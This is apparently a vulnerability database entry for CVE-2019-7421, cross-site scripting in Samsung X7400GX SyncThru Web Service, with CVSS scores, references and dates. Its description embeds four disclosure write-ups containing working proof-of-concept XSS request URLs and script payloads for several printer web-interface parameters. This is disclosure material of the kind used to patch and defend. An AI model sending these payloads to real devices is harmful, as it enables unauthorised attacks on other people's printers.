Sign-up

ID

VAR-201903-0464


CVE

CVE-2019-7421


TITLE

SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2019-002760

DESCRIPTION

SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->

Trust: 0.9

sources: JVNDB: JVNDB-2019-002760 // VULHUB: VHN-158856 // PACKETSTORM: 151584

AFFECTED PRODUCTS

vendor:samsungmodel:syncthru web servicescope:eqversion: -

Trust: 1.0

vendor:samsungmodel:x7400gxscope:eqversion:6.a6.25

Trust: 1.0

vendor:samsungmodel:syncthru web servicescope: - version: -

Trust: 0.8

vendor:samsungmodel:x7400gxscope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2019-002760 // NVD: CVE-2019-7421

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-7421
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-7421
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201902-577
value: MEDIUM

Trust: 0.6

VULHUB: VHN-158856
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-7421
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-158856
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-7421
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-158856 // JVNDB: JVNDB-2019-002760 // CNNVD: CNNVD-201902-577 // NVD: CVE-2019-7421

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-158856 // JVNDB: JVNDB-2019-002760 // NVD: CVE-2019-7421

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201902-577

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 151584 // CNNVD: CNNVD-201902-577

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2019-002760

PATCH
title:Top Pageurl:https://www.samsung.com/
Trust: 0.8
title:SAMSUNG X7400GX SyncThru Web Service Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89375
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2019-002760 // 
            
            
            
            CNNVD: CNNVD-201902-577

EXTERNAL IDS
db:NVDid:CVE-2019-7421
Trust: 2.6
db:PACKETSTORMid:151584
Trust: 2.6
db:JVNDBid:JVNDB-2019-002760
Trust: 0.8
db:CNNVDid:CNNVD-201902-577
Trust: 0.7
db:VULHUBid:VHN-158856
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158856 // 
            
            
            
            JVNDB: JVNDB-2019-002760 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-577 // 
            
            
            
            NVD: CVE-2019-7421

REFERENCES
url:http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html
Trust: 3.1
url:http://www.samsung.com/support/productsupport/download/index.aspx
Trust: 1.8
url:http://seclists.org/fulldisclosure/2019/feb/28
Trust: 1.7
url:http://www.samsungprinter.com/
Trust: 1.7
url:https://nvd.nist.gov/vuln/detail/cve-2019-7421
Trust: 1.5
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7421
Trust: 0.8
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&nfunc=closepopup('successmsg
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e&ruifw_pid=maintenance&ruifw_title=mantenimiento
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=maintenance&ruifw_title=%3cscript%3ealert(xss);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7418
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7419
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e&popupid=id_login
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e&ruifw_title=mantenimiento
Trust: 0.1
url:http://www.samsungprinter.com/,
Trust: 0.1
url:http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7420
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&flag=&frame=&msg=the%20requested%20report(s)%20will%20be%20printed
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158856 // 
            
            
            
            JVNDB: JVNDB-2019-002760 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-577 // 
            
            
            
            NVD: CVE-2019-7421

CREDITS
Rafael Pedrero
Trust: 0.1
sources:
            
            
            PACKETSTORM: 151584

SOURCES
db:VULHUBid:VHN-158856
db:JVNDBid:JVNDB-2019-002760
db:PACKETSTORMid:151584
db:CNNVDid:CNNVD-201902-577
db:NVDid:CVE-2019-7421

LAST UPDATE DATE
2024-11-23T22:12:08.701000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-158856date:2019-03-25T00:00:00
db:JVNDBid:JVNDB-2019-002760date:2019-04-22T00:00:00
db:CNNVDid:CNNVD-201902-577date:2019-04-01T00:00:00
db:NVDid:CVE-2019-7421date:2024-11-21T04:48:11.733

SOURCES RELEASE DATE
db:VULHUBid:VHN-158856date:2019-03-21T00:00:00
db:JVNDBid:JVNDB-2019-002760date:2019-04-22T00:00:00
db:PACKETSTORMid:151584date:2019-02-08T02:22:22
db:CNNVDid:CNNVD-201902-577date:2019-02-08T00:00:00
db:NVDid:CVE-2019-7421date:2019-03-21T16:01:13.063